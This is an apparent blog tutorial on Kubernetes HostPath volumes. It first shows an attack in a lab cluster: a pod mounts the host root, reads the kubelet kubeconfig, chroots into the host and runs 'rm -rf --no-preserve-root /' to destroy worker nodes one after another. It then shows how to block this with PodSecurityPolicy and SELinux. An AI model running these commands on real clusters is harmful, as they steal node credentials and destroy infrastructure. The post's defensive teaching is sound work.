This post will demonstrate how Kubernetes HostPath volumes can help you get access to the Kubernetes nodes. At the very least, you can play with the file system of the node on which your pod is scheduled. You can also get access to other containers running on the host, the kubelet's certificates, and so on.
I have a cluster with 3 masters and 3 worker nodes, set up using this script, running in a Vagrant environment.
All the worker nodes are in the Ready state:
$ kubectl get nodes -o wide
NAME STATUS ROLES AGE VERSION INTERNAL-IP EXTERNAL-IP OS-IMAGE KERNEL-VERSION CONTAINER-RUNTIME
worker-0 Ready <none> 24m v1.11.2 192.168.199.20 <none> Ubuntu 18.04.1 LTS 4.15.0-33-generic cri-o://1.11.2
worker-1 Ready <none> 23m v1.11.2 192.168.199.21 <none> Ubuntu 18.04.1 LTS 4.15.0-33-generic cri-o://1.11.2
worker-2 Ready <none> 21m v1.11.2 192.168.199.22 <none> Ubuntu 18.04.1 LTS 4.15.0-33-generic cri-o://1.11.2
The deployment looks like this:
$ cat deployment.yaml
apiVersion: apps/v1
kind: Deployment
metadata:
  labels:
    run: web
  name: web
spec:
  replicas: 1
  selector:
    matchLabels:
      run: web
  template:
    metadata:
      labels:
        run: web
    spec:
      containers:
      - image: centos/httpd
        name: web
        volumeMounts:
        - mountPath: /web
          name: test-volume
      volumes:
      - name: test-volume
        hostPath:
          path: /
Above you can see that we are mounting / of the host inside the pod at /web. This is our gateway to the host's file system. Let's deploy this:
$ kubectl apply -f deployment.yaml
deployment.apps/web created
And now the pod has started:
$ kubectl get pods -o wide
NAME READY STATUS RESTARTS AGE IP NODE NOMINATED NODE
web-66cdf67bbc-44zhj 1/1 Running 0 4m 10.38.0.1 worker-2 <none>
Getting inside the pod and checking out the mounted directory:
$ kubectl exec -it web-66cdf67bbc-44zhj bash
[root@web-66cdf67bbc-44zhj /]# cd /web
[root@web-66cdf67bbc-44zhj web]# ls
bin boot dev etc home initrd.img initrd.img.old lib lib64 lost+found media mnt opt proc root run sbin snap srv sys tmp usr vagrant var vmlinuz vmlinuz.old
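Before doing anything destructive, note that this mount already exposes sensitive material. For example, the kubelet's kubeconfig and TLS keys usually live under /var/lib/kubelet on the host; the exact file names depend on how the cluster was provisioned, so treat these paths as illustrative:
[root@web-66cdf67bbc-44zhj web]# ls /web/var/lib/kubelet/
[root@web-66cdf67bbc-44zhj web]# cat /web/var/lib/kubelet/kubeconfig
Credentials like these would let an attacker talk to the API server as the node itself.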
Now we can either chroot into this and see the output of ps:
[root@web-66cdf67bbc-44zhj ~]# chroot /web
# ps aufx
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 2 0.0 0.0 0 0 ? S 05:15 0:00 [kthreadd]
root 4 0.0 0.0 0 0 ? I< 05:15 0:00 \_ [kworker/0:0H]
root 6 0.0 0.0 0 0 ? I< 05:15 0:00 \_ [mm_percpu_wq]
root 7 0.0 0.0 0 0 ? S 05:15 0:00 \_ [ksoftirqd/0]
root 8 0.0 0.0 0 0 ? I 05:15 0:00 \_ [rcu_sched]
root 9 0.0 0.0 0 0 ? I 05:15 0:00 \_ [rcu_bh]
root 10 0.0 0.0 0 0 ? S 05:15 0:00 \_ [migration/0]
root 11 0.0 0.0 0 0 ? S 05:15 0:00 \_ [watchdog/0]
root 12 0.0 0.0 0 0 ? S 05:15 0:00 \_ [cpuhp/0]
Or you can just delete the entire root, a.k.a. nuke the node:
# rm -rf --no-preserve-root /
Now if you look at the nodes:
$ kubectl get nodes -o wide
NAME STATUS ROLES AGE VERSION INTERNAL-IP EXTERNAL-IP OS-IMAGE KERNEL-VERSION CONTAINER-RUNTIME
worker-0 Ready <none> 30m v1.11.2 192.168.199.20 <none> Ubuntu 18.04.1 LTS 4.15.0-33-generic cri-o://1.11.2
worker-1 Ready <none> 29m v1.11.2 192.168.199.21 <none> Ubuntu 18.04.1 LTS 4.15.0-33-generic cri-o://1.11.2
worker-2 NotReady <none> 27m v1.11.2 192.168.199.22 <none> Unknown 4.15.0-33-generic cri-o://Unknown
The last node, worker-2, is now in the NotReady state. We have successfully made one node unusable. Now that this node is gone, the pod will be scheduled on another node, where you can do similar stuff.
$ kubectl get pods -o wide
NAME READY STATUS RESTARTS AGE IP NODE NOMINATED NODE
web-66cdf67bbc-44zhj 0/1 Unknown 0 20m 10.38.0.1 worker-2 <none>
web-66cdf67bbc-b22xn 1/1 Running 0 8m 10.32.0.2 worker-0 <none>
As you can see above, the pod has been re-scheduled on node worker-0, and we can repeat the same set of steps to make worker-0 unusable.
Delete the deployment to clean up:
$ kubectl delete deployment web
deployment.extensions "web" deleted
Stopping this attack using PodSecurityPolicy
Now, as a cluster admin, how can you prevent this from happening? You can create something called a PodSecurityPolicy. This lets you define what kinds of pods can be created and what permissions a pod can request. You also need to enable the corresponding admission controller for this to take effect; read about it here.
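If the PodSecurityPolicy admission plugin is not enabled on the API server, any policies you create are simply ignored. Enabling it means adding the plugin to the kube-apiserver flags (the flag below is correct for Kubernetes 1.11; where you edit it depends on how your control plane is deployed, and NodeRestriction is just an example of a plugin you may already have enabled):
kube-apiserver \
  --enable-admission-plugins=NodeRestriction,PodSecurityPolicy \
  ...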
Here is an example PodSecurityPolicy:
$ cat podsecuritypolicy.yaml
apiVersion: policy/v1beta1
kind: PodSecurityPolicy
metadata:
  name: example
spec:
  seLinux:
    rule: RunAsAny
  supplementalGroups:
    rule: RunAsAny
  runAsUser:
    rule: RunAsAny
  fsGroup:
    rule: RunAsAny
  volumes:
  - '*'
  privileged: false  # Don't allow privileged pods!
  allowedHostPaths:
  - pathPrefix: /foo
    readOnly: true
In the above example, we are restricting which hostPath a pod can request: the only allowed path is /foo, and it only grants read-only access to the underlying file system.
Create the PodSecurityPolicy using the above file:
$ kubectl apply -f podsecuritypolicy.yaml
podsecuritypolicy.policy/example created
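You can verify that the policy exists; psp is the short name for podsecuritypolicies (the exact columns may vary slightly between versions):
$ kubectl get psp example
NAME      PRIV    CAPS   SELINUX    RUNASUSER   FSGROUP    SUPGROUP   READONLYROOTFS   VOLUMES
example   false          RunAsAny   RunAsAny    RunAsAny   RunAsAny   false            *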
To enable this policy we need to create a few more objects: a Role and a RoleBinding.
The Role:
$ cat role.yaml
kind: Role
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  name: authorize-hostpath
rules:
- apiGroups: ['policy']
  resources: ['podsecuritypolicies']
  verbs: ['use']
  resourceNames:
  - example
This Role allows the use of the policy that we created above.
Create the Role:
$ kubectl apply -f role.yaml
role.rbac.authorization.k8s.io/authorize-hostpath created
The RoleBinding:
$ cat rolebinding.yaml
kind: RoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  name: auth-hostpath
roleRef:
  kind: Role
  name: authorize-hostpath
  apiGroup: rbac.authorization.k8s.io
subjects:
# Authorize all service accounts in a namespace:
- kind: Group
  apiGroup: rbac.authorization.k8s.io
  name: system:serviceaccounts
This RoleBinding binds the above Role to all the ServiceAccounts in the current namespace.
Create the RoleBinding:
$ kubectl create -f rolebinding.yaml
rolebinding.rbac.authorization.k8s.io/auth-hostpath created
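To check that the binding works as intended, you can ask the API server whether a service account is allowed to use the policy. Here I am assuming the default service account in the default namespace; adjust the name for your setup:
$ kubectl auth can-i use podsecuritypolicies/example --as=system:serviceaccount:default:default
yes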
Now that we have the required permissions in place, try to re-create the deployment:
$ kubectl apply -f deployment.yaml
deployment.apps/web created
The pod is not created, and in the events you can see the error:
$ kubectl get events
LAST SEEN FIRST SEEN COUNT NAME KIND SUBOBJECT TYPE REASON SOURCE MESSAGE
...
6s 17s 12 web-66cdf67bbc.15530e83fd4f8592 ReplicaSet Warning FailedCreate replicaset-controller Error creating: pods "web-66cdf67bbc-" is forbidden: unable to validate against any pod security policy: [spec.volumes[0].hostPath.pathPrefix: Invalid value: "/": is not allowed to be used]
This error is due to the fact that we have only allowed hostPath volumes under /foo, while in the original file the path is set to /.
Now, in the deployment.yaml file, change deployment.spec.template.spec.volumes[0].hostPath.path from / to /foo and apply again:
$ kubectl apply -f deployment.yaml
deployment.apps/web configured
You will see another error in the events:
$ kubectl get events
LAST SEEN FIRST SEEN COUNT NAME KIND SUBOBJECT TYPE REASON SOURCE MESSAGE
...
5s 15s 12 web-85cb548b47.15530eb0c27c6122 ReplicaSet Warning FailedCreate replicaset-controller Error creating: pods "web-85cb548b47-" is forbidden: unable to validate against any pod security policy: [spec.containers[0].volumeMounts[0].readOnly: Invalid value: false: must be read-only]
This is because the readOnly field of the volumeMount used in the container has no value defined, which means it defaults to false, while in the PodSecurityPolicy we have required the hostPath to be read-only.
So change deployment.spec.template.spec.containers[0].volumeMounts[0].readOnly to true. The manifest should now look like the following:
$ cat deployment.yaml
apiVersion: apps/v1
kind: Deployment
metadata:
  labels:
    run: web
  name: web
spec:
  replicas: 1
  selector:
    matchLabels:
      run: web
  template:
    metadata:
      labels:
        run: web
    spec:
      containers:
      - image: centos/httpd
        name: web
        volumeMounts:
        - mountPath: /web
          name: test-volume
          readOnly: true
      volumes:
      - name: test-volume
        hostPath:
          path: /foo
Now if you re-deploy the app:
$ kubectl apply -f deployment.yaml
deployment.apps/web configured
The pod is scheduled and created:
$ kubectl get pods
NAME READY STATUS RESTARTS AGE
web-7b77459d6b-kbqm8 1/1 Running 0 7s
Now if you exec into this pod and try to write to the mounted directory, it fails:
$ kubectl exec -it web-7b77459d6b-kbqm8 bash
[root@web-7b77459d6b-kbqm8 /]# cd /web/
[root@web-7b77459d6b-kbqm8 web]# ls
[root@web-7b77459d6b-kbqm8 web]# touch file.txt
touch: cannot touch 'file.txt': Read-only file system
So this is a really good feature you can use to stop someone from nuking your cluster.
Stopping this attack using SELinux
The cluster above was running Ubuntu-based machines; now I have a Kubernetes cluster set up on Fedora, which supports SELinux. You can set up this cluster by following the steps in this post.
Note: This is a simple cluster setup without PodSecurityPolicy.
Once you have the cluster running:
$ kubectl get nodes -o wide
NAME STATUS ROLES AGE VERSION INTERNAL-IP EXTERNAL-IP OS-IMAGE KERNEL-VERSION CONTAINER-RUNTIME
fedora Ready master 23m v1.11.2 10.0.2.15 <none> Fedora 28 (Cloud Edition) 4.16.3-301.fc28.x86_64 docker://1.13.1
Let's follow the same set of steps and create the deployment:
$ kubectl apply -f deployment.yaml
deployment.apps/web created
The pod is created:
$ kubectl get pods
NAME READY STATUS RESTARTS AGE
web-66cdf67bbc-t9n7m 1/1 Running 0 28s
Getting into the pod:
$ kubectl exec -it web-66cdf67bbc-t9n7m bash
[root@web-66cdf67bbc-t9n7m /]#
[root@web-66cdf67bbc-t9n7m /]# cd /web/
[root@web-66cdf67bbc-t9n7m web]# ls
bin boot dev etc home lib lib64 lost+found media mnt opt proc root run sbin srv sys tmp usr vagrant var
[root@web-66cdf67bbc-t9n7m web]# touch file.txt
touch: cannot touch 'file.txt': Permission denied
As you can see, if you go to the root of the host, which is mounted at /web, and try to create a new file, it fails. This event is logged in the SELinux audit logs; run the following on the host to see them:
# ausearch -m avc
----
time->Tue Sep 11 06:41:54 2018
type=AVC msg=audit(1536648114.522:985): avc: denied { write } for pid=15775 comm="touch" name="/" dev="sda1" ino=2 scontext=system_u:system_r:container_t:s0:c230,c784 tcontext=system_u:object_r:root_t:s0 tclass=dir permissive=0
Here plain SELinux has stopped the container from writing to places it shouldn't. Compared to PodSecurityPolicy (which is a beta feature in Kubernetes 1.11), SELinux can help you right away if you are running an older Kubernetes cluster on CentOS or RHEL.
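If you want to check up front whether your nodes give you this protection, verify that SELinux is in enforcing mode and that container processes run with the container_t label, which is the scontext you can see in the AVC denial above:
# getenforce
Enforcing
# ps -eZ | grep container_t
Both commands are standard on Fedora, CentOS, and RHEL hosts.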